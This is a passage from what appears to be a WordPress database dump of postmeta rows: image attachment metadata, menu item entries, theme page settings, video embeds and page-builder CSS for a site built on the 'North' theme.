";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:26:\"testimonials-1-880x537.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:537;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:26:\"testimonials-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:26:\"testimonials-1-450x275.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:275;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:26:\"testimonials-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(306,1039,'_wp_attached_file','2014/09/rain-bg.jpg'),(307,1039,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1142;s:4:\"file\";s:19:\"2014/09/rain-bg.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"rain-bg-300x178.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"rain-bg-1024x609.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:609;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"rain-bg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"rain-bg-768x457.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:457;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:20:\"rain-bg-1536x914.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:914;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"rain-bg-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:20:\"rain-bg-1670x993.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:993;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:20:\"rain-bg-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:19:\"rain-bg-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:19:\"rain-bg-880x523.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:523;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:19:\"rain-bg-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:19:\"rain-bg-450x268.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:268;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:19:\"rain-bg-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(309,1714,'_menu_item_type','custom'),(310,1714,'_menu_item_menu_item_parent','0'),(311,1714,'_menu_item_object_id','1714'),(312,1714,'_menu_item_object','custom'),(313,1714,'_menu_item_target',''),(314,1714,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(315,1714,'_menu_item_xfn',''),(316,1714,'_menu_item_url','http://frontpage_url/#about'),(317,1715,'_menu_item_type','custom'),(318,1715,'_menu_item_menu_item_parent','0'),(319,1715,'_menu_item_object_id','1715'),(320,1715,'_menu_item_object','custom'),(321,1715,'_menu_item_target',''),(322,1715,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(323,1715,'_menu_item_xfn',''),(324,1715,'_menu_item_url','http://frontpage_url/#home'),(325,1716,'_menu_item_type','custom'),(326,1716,'_menu_item_menu_item_parent','0'),(327,1716,'_menu_item_object_id','1716'),(328,1716,'_menu_item_object','custom'),(329,1716,'_menu_item_target',''),(330,1716,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(331,1716,'_menu_item_xfn',''),(332,1716,'_menu_item_url','http://frontpage_url/#works'),(333,1717,'_menu_item_type','custom'),(334,1717,'_menu_item_menu_item_parent','1714'),(335,1717,'_menu_item_object_id','1717'),(336,1717,'_menu_item_object','custom'),(337,1717,'_menu_item_target',''),(338,1717,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(339,1717,'_menu_item_xfn',''),(340,1717,'_menu_item_url','http://frontpage_url/#what-we-do'),(341,1718,'_menu_item_type','custom'),(342,1718,'_menu_item_menu_item_parent','1714'),(343,1718,'_menu_item_object_id','1718'),(344,1718,'_menu_item_object','custom'),(345,1718,'_menu_item_target',''),(346,1718,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(347,1718,'_menu_item_xfn',''),(348,1718,'_menu_item_url','http://frontpage_url/#facts'),(349,1719,'_menu_item_type','custom'),(350,1719,'_menu_item_menu_item_parent','0'),(351,1719,'_menu_item_object_id','1719'),(352,1719,'_menu_item_object','custom'),(353,1719,'_menu_item_target',''),(354,1719,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(355,1719,'_menu_item_xfn',''),(356,1719,'_menu_item_url','http://frontpage_url/#team'),(357,1720,'_menu_item_type','custom'),(358,1720,'_menu_item_menu_item_parent','0'),(359,1720,'_menu_item_object_id','1720'),(360,1720,'_menu_item_object','custom'),(361,1720,'_menu_item_target',''),(362,1720,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(363,1720,'_menu_item_xfn',''),(364,1720,'_menu_item_url','http://frontpage_url/#features'),(365,1721,'_menu_item_type','custom'),(366,1721,'_menu_item_menu_item_parent','0'),(367,1721,'_menu_item_object_id','1721'),(368,1721,'_menu_item_object','custom'),(369,1721,'_menu_item_target',''),(370,1721,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(371,1721,'_menu_item_xfn',''),(372,1721,'_menu_item_url','http://frontpage_url/#services'),(373,1722,'_menu_item_type','custom'),(374,1722,'_menu_item_menu_item_parent','0'),(375,1722,'_menu_item_object_id','1722'),(376,1722,'_menu_item_object','custom'),(377,1722,'_menu_item_target',''),(378,1722,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(379,1722,'_menu_item_xfn',''),(380,1722,'_menu_item_url','http://frontpage_url/#contact'),(381,1723,'_menu_item_type','custom'),(382,1723,'_menu_item_menu_item_parent','0'),(383,1723,'_menu_item_object_id','1723'),(384,1723,'_menu_item_object','custom'),(385,1723,'_menu_item_target',''),(386,1723,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(387,1723,'_menu_item_xfn',''),(388,1723,'_menu_item_url','#'),(389,1827,'_menu_item_type','custom'),(390,1827,'_menu_item_menu_item_parent','0'),(391,1827,'_menu_item_object_id','1827'),(392,1827,'_menu_item_object','custom'),(393,1827,'_menu_item_target',''),(394,1827,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(395,1827,'_menu_item_xfn',''),(396,1827,'_menu_item_url','#home'),(397,1835,'_menu_item_type','custom'),(398,1835,'_menu_item_menu_item_parent','0'),(399,1835,'_menu_item_object_id','1835'),(400,1835,'_menu_item_object','custom'),(401,1835,'_menu_item_target',''),(402,1835,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(403,1835,'_menu_item_xfn',''),(404,1835,'_menu_item_url','http://frontpage_url/#prices'),(405,1883,'_menu_item_type','custom'),(406,1883,'_menu_item_menu_item_parent','0'),(407,1883,'_menu_item_object_id','1883'),(408,1883,'_menu_item_object','custom'),(409,1883,'_menu_item_target',''),(410,1883,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(411,1883,'_menu_item_xfn',''),(412,1883,'_menu_item_url','#fashion'),(413,1884,'_menu_item_type','custom'),(414,1884,'_menu_item_menu_item_parent','0'),(415,1884,'_menu_item_object_id','1884'),(416,1884,'_menu_item_object','custom'),(417,1884,'_menu_item_target',''),(418,1884,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(419,1884,'_menu_item_xfn',''),(420,1884,'_menu_item_url','#naturel'),(421,1885,'_menu_item_type','custom'),(422,1885,'_menu_item_menu_item_parent','0'),(423,1885,'_menu_item_object_id','1885'),(424,1885,'_menu_item_object','custom'),(425,1885,'_menu_item_target',''),(426,1885,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(427,1885,'_menu_item_xfn',''),(428,1885,'_menu_item_url','#blues'),(429,1886,'_menu_item_type','custom'),(430,1886,'_menu_item_menu_item_parent','0'),(431,1886,'_menu_item_object_id','1886'),(432,1886,'_menu_item_object','custom'),(433,1886,'_menu_item_target',''),(434,1886,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(435,1886,'_menu_item_xfn',''),(436,1886,'_menu_item_url','#animals'),(437,1887,'_menu_item_type','custom'),(438,1887,'_menu_item_menu_item_parent','0'),(439,1887,'_menu_item_object_id','1887'),(440,1887,'_menu_item_object','custom'),(441,1887,'_menu_item_target',''),(442,1887,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(443,1887,'_menu_item_xfn',''),(444,1887,'_menu_item_url','#contact'),(445,1888,'_menu_item_type','post_type'),(446,1888,'_menu_item_menu_item_parent','1889'),(447,1888,'_menu_item_object_id','1900'),(448,1888,'_menu_item_object','page'),(449,1888,'_menu_item_target',''),(450,1888,'_menu_item_classes','a:1:{i:0;s:7:\"ex-link\";}'),(451,1888,'_menu_item_xfn',''),(452,1888,'_menu_item_url',''),(454,1889,'_menu_item_type','post_type'),(455,1889,'_menu_item_menu_item_parent','0'),(456,1889,'_menu_item_object_id','255'),(457,1889,'_menu_item_object','page'),(458,1889,'_menu_item_target',''),(459,1889,'_menu_item_classes','a:1:{i:0;s:7:\"ex-link\";}'),(460,1889,'_menu_item_xfn',''),(461,1889,'_menu_item_url',''),(463,1891,'_menu_item_menu_item_parent','1889'),(464,1891,'_menu_item_object_id','255'),(465,1891,'_menu_item_object','page'),(466,1891,'_menu_item_target',''),(467,1891,'_menu_item_classes','a:1:{i:0;s:7:\"ex-link\";}'),(468,1891,'_menu_item_xfn',''),(469,1891,'_menu_item_url',''),(470,1891,'_menu_item_type','post_type'),(472,1892,'_menu_item_type','post_type'),(473,1892,'_menu_item_menu_item_parent','1889'),(474,1892,'_menu_item_object_id','116'),(475,1892,'_menu_item_object','portfolio'),(476,1892,'_menu_item_target',''),(477,1892,'_menu_item_classes','a:1:{i:0;s:7:\"ex-link\";}'),(478,1892,'_menu_item_xfn',''),(479,1892,'_menu_item_url',''),(481,1893,'_menu_item_type','post_type'),(482,1893,'_menu_item_menu_item_parent','1889'),(483,1893,'_menu_item_object_id','784'),(484,1893,'_menu_item_object','page'),(485,1893,'_menu_item_target',''),(486,1893,'_menu_item_classes','a:1:{i:0;s:7:\"ex-link\";}'),(487,1893,'_menu_item_xfn',''),(488,1893,'_menu_item_url',''),(490,1894,'_menu_item_type','post_type'),(491,1894,'_menu_item_menu_item_parent','1889'),(492,1894,'_menu_item_object_id','274'),(493,1894,'_menu_item_object','post'),(494,1894,'_menu_item_target',''),(495,1894,'_menu_item_classes','a:1:{i:0;s:7:\"ex-link\";}'),(496,1894,'_menu_item_xfn',''),(497,1894,'_menu_item_url',''),(499,1895,'_menu_item_type','post_type'),(500,1895,'_menu_item_menu_item_parent','1889'),(501,1895,'_menu_item_object_id','820'),(502,1895,'_menu_item_object','page'),(503,1895,'_menu_item_target',''),(504,1895,'_menu_item_classes','a:1:{i:0;s:7:\"ex-link\";}'),(505,1895,'_menu_item_xfn',''),(506,1895,'_menu_item_url',''),(508,1896,'_menu_item_type','post_type'),(509,1896,'_menu_item_menu_item_parent','1889'),(510,1896,'_menu_item_object_id','818'),(511,1896,'_menu_item_object','page'),(512,1896,'_menu_item_target',''),(513,1896,'_menu_item_classes','a:1:{i:0;s:7:\"ex-link\";}'),(514,1896,'_menu_item_xfn',''),(515,1896,'_menu_item_url',''),(517,1897,'_menu_item_type','post_type'),(518,1897,'_menu_item_menu_item_parent','1889'),(519,1897,'_menu_item_object_id','118'),(520,1897,'_menu_item_object','portfolio'),(521,1897,'_menu_item_target',''),(522,1897,'_menu_item_classes','a:1:{i:0;s:7:\"ex-link\";}'),(523,1897,'_menu_item_xfn',''),(524,1897,'_menu_item_url',''),(526,1898,'_menu_item_type','post_type'),(527,1898,'_menu_item_menu_item_parent','1889'),(528,1898,'_menu_item_object_id','117'),(529,1898,'_menu_item_object','portfolio'),(530,1898,'_menu_item_target',''),(531,1898,'_menu_item_classes','a:1:{i:0;s:7:\"ex-link\";}'),(532,1898,'_menu_item_xfn',''),(533,1898,'_menu_item_url',''),(535,1899,'_wp_page_template','default'),(536,1900,'theme_skin','default'),(537,1900,'theme_tone','default'),(538,1900,'footer_color','default'),(539,1900,'loader','default'),(540,1900,'_wpb_shortcodes_custom_css','.vc_custom_1405464975290{background-color: #a5a5a5 !important;}'),(541,1900,'navbar_color','white'),(542,1900,'page_width','fullwidth'),(543,1900,'navbar_style','style2'),(544,1900,'page_type','default'),(545,1900,'slide_template','default'),(546,1900,'_wp_page_template','default'),(547,1900,'_wpb_vc_js_status','true'),(548,1900,'_wpb_vc_js_interface_version','2'),(549,1900,'page_title',''),(550,1900,'page_layout','fullwidth'),(551,1900,'page_sidebar','Default Sidebar'),(552,1900,'page_header','no-header'),(553,1900,'header_text_align','left'),(554,1900,'page_tagline',''),(555,1900,'page_subtitle',''),(556,1900,'header_title_color',''),(557,1900,'header_tagline_color',''),(558,1900,'header_bg_color',''),(559,1900,'header_bg_img',''),(560,1900,'header_bg_img_repeat','no-repeat'),(561,1900,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(562,1900,'header_slider_layer_alias','1'),(563,1900,'header_slider_rev_alias','none'),(564,1900,'header_slider_type','layer_slider'),(565,1900,'header_bg_parallax','no'),(566,1900,'header_bg_img_position','top left'),(567,255,'page_width','content'),(568,255,'navbar_style','style1'),(569,255,'navbar_color','default'),(570,255,'_oembed_a10e1fcdd76bedd10b3010c4ae3f8009','<iframe width=\"1170\" height=\"658\" src=\"https://www.youtube.com/embed/mSLAF_DjiDU?feature=oembed\" frameborder=\"0\" allowfullscreen></iframe>'),(571,255,'footer_color','default'),(572,255,'_oembed_4fe7d3afe8d7ff3170ad4a5d5ef292ea','<iframe src=\"//player.vimeo.com/video/55945051\" width=\"1170\" height=\"498\" frameborder=\"0\" title=\"Time of Rio\" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe>'),(573,255,'slide_template','default'),(574,255,'theme_skin','default'),(575,255,'theme_tone','default'),(576,255,'page_type','default'),(577,255,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(578,255,'header_slider_layer_alias','1'),(579,255,'header_slider_rev_alias','none'),(580,255,'header_slider_type','layer_slider'),(581,255,'page_subtitle','Buttons, Icons, Boxes and More Elements.'),(582,255,'page_header','default'),(583,255,'page_sidebar','Default Sidebar'),(584,255,'page_layout','fullwidth'),(585,255,'_wpb_vc_js_interface_version','2'),(586,255,'_wpb_vc_js_status','true'),(587,255,'_wp_page_template','default'),(588,328,'_wp_page_template','template-home8.php'),(589,328,'_wpb_vc_js_status','true'),(590,328,'_wpb_vc_js_interface_version','2'),(591,328,'page_layout','fullwidth'),(592,328,'page_sidebar','Default Sidebar'),(593,328,'page_width','fullwidth'),(594,328,'navbar_style','style3'),(595,328,'navbar_color','dark'),(596,328,'page_header','no-header'),(597,328,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(598,328,'_wpb_shortcodes_custom_css','.vc_custom_1405493927837{margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1408422099994{margin-bottom: 0px !important;background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/slide7.jpg?id=548) !important;}.vc_custom_1405412510138{margin-bottom: 0px !important;background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/m-slide2.jpg?id=561) !important;}.vc_custom_1405412591005{margin-bottom: 0px !important;background-image: url(http://localhost/north1/wp-content/uploads/2014/07/slide8.jpg?id=335) !important;}.vc_custom_1408422142417{margin-bottom: 0px !important;background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/slide10.jpg?id=551) !important;}.vc_custom_1405412637738{margin-bottom: 0px !important;padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1408422194164{margin-bottom: 0px !important;padding-top: 100px !important;padding-bottom: 100px !important;background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i6.jpg?id=541) !important;}'),(599,328,'slide_template','default'),(600,328,'footer_color','default'),(601,328,'page_subtitle',''),(602,328,'theme_skin','default'),(603,328,'theme_tone','default'),(604,623,'_wp_page_template','template-onepager.php'),(605,623,'_wpb_vc_js_status','true'),(606,623,'_wpb_vc_js_interface_version','0'),(607,623,'page_title',''),(608,623,'page_layout','fullwidth'),(609,623,'page_sidebar','default_sidebar'),(610,623,'page_header','no-header'),(611,623,'header_text_align','left'),(612,623,'page_tagline',''),(613,623,'page_subtitle',''),(614,623,'header_title_color',''),(615,623,'header_tagline_color',''),(616,623,'header_bg_color',''),(617,623,'header_bg_img',''),(618,623,'header_bg_img_repeat','no-repeat'),(619,623,'header_bg_img_position','top left'),(620,623,'header_bg_parallax','no'),(621,623,'header_slider_type','layer_slider'),(622,623,'header_slider_rev_alias','none'),(623,623,'header_slider_layer_alias','1'),(624,623,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(625,623,'_wpb_shortcodes_custom_css','.vc_custom_1612191669997{padding-top: 237px !important;padding-bottom: 237px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-80-1.png?id=2142) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}'),(1431,2043,'_wp_attached_file','2020/10/Untitled-design-27-1.png'),(626,623,'slide_template','default'),(627,623,'title',''),(628,623,'page_type','default'),(629,623,'page_width','content'),(630,623,'navbar_style','default'),(631,623,'navbar_color','default'),(632,623,'footer_color','default'),(633,623,'loader','default'),(634,623,'theme_skin','default'),(635,623,'theme_tone','default'),(637,629,'_wp_page_template','template-onepager.php'),(638,629,'_wpb_shortcodes_custom_css','.vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}.vc_custom_1405099060231{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i1.jpg?id=536) !important;}.vc_custom_1405492003813{border-top-width: 1px !important;padding-bottom: 10px !important;border-color: #eeeeee !important;border-style: solid !important;}.vc_custom_1405099363182{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i2.jpg?id=537) !important;}.vc_custom_1406709787994{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1408506097407{padding-top: 0px !important;background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}.vc_custom_1404037588724{padding-bottom: 70px !important;}.vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}.vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}.vc_custom_1409759263341{padding-bottom: 80px !important;}.vc_custom_1405099662664{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i3.jpg?id=538) !important;}.vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099917341{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i4.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099958560{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405424323297{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406709770765{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709776984{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(639,629,'_wpb_vc_js_status','true'),(640,629,'_wpb_vc_js_interface_version','2'),(641,629,'slide_template','default'),(642,629,'page_layout','fullwidth'),(643,629,'page_sidebar','Default Sidebar'),(644,629,'page_width','fullwidth'),(645,629,'navbar_style','style2'),(646,629,'navbar_color','dark'),(647,629,'footer_color','default'),(648,629,'page_header','no-header'),(649,629,'page_subtitle',''),(650,629,'title',''),(651,629,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(652,629,'theme_skin','default'),(653,629,'theme_tone','dark'),(654,629,'loader','default'),(656,638,'_wp_page_template','template-landing.php'),(657,638,'_wpb_vc_js_status','false'),(658,638,'_wpb_vc_js_interface_version','2'),(659,638,'slide_template','default'),(660,638,'page_layout','fullwidth'),(661,638,'page_sidebar','Default Sidebar'),(662,638,'page_width','content'),(663,638,'navbar_style','default'),(664,638,'navbar_color','default'),(665,638,'footer_color','default'),(666,638,'page_header','default'),(667,638,'page_subtitle',''),(668,638,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(669,691,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(670,691,'page_width','content'),(671,691,'navbar_style','default'),(672,691,'navbar_color','default'),(673,691,'footer_color','default'),(674,691,'page_header','default'),(675,691,'page_subtitle',''),(676,691,'_wp_page_template','template-onepager.php'),(677,691,'_wpb_vc_js_status','true'),(678,691,'_wpb_vc_js_interface_version','2'),(679,691,'slide_template','default'),(680,691,'page_layout','fullwidth'),(681,691,'page_sidebar','Default Sidebar'),(682,691,'theme_skin','default'),(683,691,'theme_tone','default'),(684,691,'_wpb_shortcodes_custom_css','.vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}.vc_custom_1405099060231{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i1.jpg?id=536) !important;}.vc_custom_1406483381202{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}.vc_custom_1405099363182{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i2.jpg?id=537) !important;}.vc_custom_1406709728346{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1408506046218{padding-top: 0px !important;background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}.vc_custom_1404037588724{padding-bottom: 70px !important;}.vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}.vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}.vc_custom_1409773905297{padding-bottom: 80px !important;}.vc_custom_1405099662664{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i3.jpg?id=538) !important;}.vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099917341{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i4.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099958560{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405424323297{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406709712876{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709718986{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(685,691,'title',''),(686,691,'loader','default'),(688,706,'page_width','content'),(689,706,'navbar_style','style2'),(690,706,'navbar_color','dark'),(691,706,'footer_color','default'),(692,706,'page_header','no-header'),(693,706,'vc_teaser','a:2:{s:4:\"data\";s:115:\"[{\"name\":\"title\",\"link\":\"post\"},{\"name\":\"image\",\"image\":\"featured\",\"link\":\"none\"},{\"name\":\"text\",\"mode\":\"excerpt\"}]\";s:7:\"bgcolor\";s:0:\"\";}'),(694,706,'page_subtitle',''),(695,706,'page_sidebar','Default Sidebar'),(696,706,'_wp_page_template','template-onepager.php'),(697,706,'_wpb_vc_js_status','true'),(698,706,'_wpb_vc_js_interface_version','2'),(699,706,'slide_template','default'),(700,706,'page_layout','fullwidth'),(701,706,'_wpb_shortcodes_custom_css','.vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}.vc_custom_1405099060231{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i1.jpg?id=536) !important;}.vc_custom_1406483441587{border-top-width: 1px !important;padding-bottom: 20px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}.vc_custom_1405099363182{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i2.jpg?id=537) !important;}.vc_custom_1406709814532{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1408506142478{padding-top: 0px !important;background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}.vc_custom_1404037588724{padding-bottom: 70px !important;}.vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}.vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}.vc_custom_1409773927619{padding-bottom: 80px !important;}.vc_custom_1405099662664{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i3.jpg?id=538) !important;}.vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099917341{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i4.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099958560{background-image: url(http://veented.com/themes/north/wp-content/uploads/2014/07/i5.jpg?id=540) !important;}.vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405424323297{background-image: 